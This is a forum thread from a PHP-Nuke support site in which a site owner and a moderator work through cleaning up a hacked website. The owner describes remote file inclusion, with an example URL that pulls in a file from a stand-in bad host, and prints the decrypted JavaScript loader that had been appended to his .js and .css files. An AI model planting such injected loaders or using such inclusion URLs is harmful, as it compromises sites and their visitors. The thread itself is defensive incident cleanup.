PHP Web Host - Quality Web Hosting For All PHP Applications Just Great Software
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
Post new topic   Reply to topic
Author Message
evaders99
Moderator


Joined: Apr 30, 2004
Posts: 2846

PostPosted: Sat Mar 08, 2008 1:55 am Reply with quote Back to top

Yep, looks like standard remote file inclusions. The code he puts would seem to block them

Did you still have questions? You seem to be getting the hang of this
View user's profile Send private message Visit poster's website
Nash
Regular
Regular


Joined: Jan 10, 2006
Posts: 86

PostPosted: Sat Mar 08, 2008 9:46 am Reply with quote Back to top

Getting there bit by bit. Still do have questions, but I will spend some more time today going through and compile a short list of them.

I found that a ton of my .jss and .css files had the Exhibit A code appended to them, so I manually went through and removed those occurences.

I still see my site being crawled with a lot of GET commands in a row, which leads me to believe the walkdir is still being executed. This leads me to believe that somehow that code is either on my server, or being executed via a hole somewhere (e.g., eastcoastbodyboarding.com/index.php?file=http://www.badsite.com/badfile.php). Does that sound right?

How would you go about locating what is causing my directories to be walked. I added that bit of code to my .htaccess to stop http: from being passed into URLs. I think though that certain directories have their own htaccess's so I will need to modify them still as well.
View user's profile Send private message
evaders99
Moderator


Joined: Apr 30, 2004
Posts: 2846

PostPosted: Sat Mar 08, 2008 4:28 pm Reply with quote Back to top

Quote:

somehow that code is either on my server, or being executed via a hole somewhere


A pretty good possibility. You may have to ask your host about it if you don't have root access to your server. There may be some process that the hackers has running in memory.

.htaccess applies to all subdirectories unless it has its own .htaccess file.
So the one .htaccess in the root directory should protect all subdirectories
View user's profile Send private message Visit poster's website
Nash
Regular
Regular


Joined: Jan 10, 2006
Posts: 86

PostPosted: Sat Mar 08, 2008 7:22 pm Reply with quote Back to top

thanks for the reply. yeah, the b*strd seems to have copied some of my htaccess files. would be easy enough to clean, but some of the other installs I have (like os commerce and ibf) have their own htaccesses in subdirectories. Will just have to get them all. I sort of suspect that the hacker originally got in through the deprecated OScommerce and Openads folders I had on my account. I wasn't using them anymore and naively thought that if they weren't linked to anything, no one would see them.
View user's profile Send private message
Nash
Regular
Regular


Joined: Jan 10, 2006
Posts: 86

PostPosted: Sat Mar 08, 2008 8:03 pm Reply with quote Back to top

This is the decrypted version of Exhibit A, by the way:

Code:

'if (!document.getElementById('JSSS'))
{
JSS1 = 54;
JSS2 = 152567;
JSS3 = '/osc/images/apebu/dummy.htm';
var js = document.createElement('script');
js.setAttribute('src', '/osc/images/apebu/check.js');
js.setAttribute('id', 'JSSS');
document.getElementsByTagName('head').item(0).appendChild(js) };'
View user's profile Send private message
Nash
Regular
Regular


Joined: Jan 10, 2006
Posts: 86

PostPosted: Mon Mar 17, 2008 8:01 am Reply with quote Back to top

Interesting. Looking at the malcode some more, it's actually re-writing the modification date and time of the file so that it does not show up as newly modified.
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2008 by Raven
Proud to be listed at Lobo Links Web Directory

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::

:: fisubice Theme Recoded To 100% W3C CSS & HTML 4.01 Transitional Compliance by Raven and 64bitguy ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum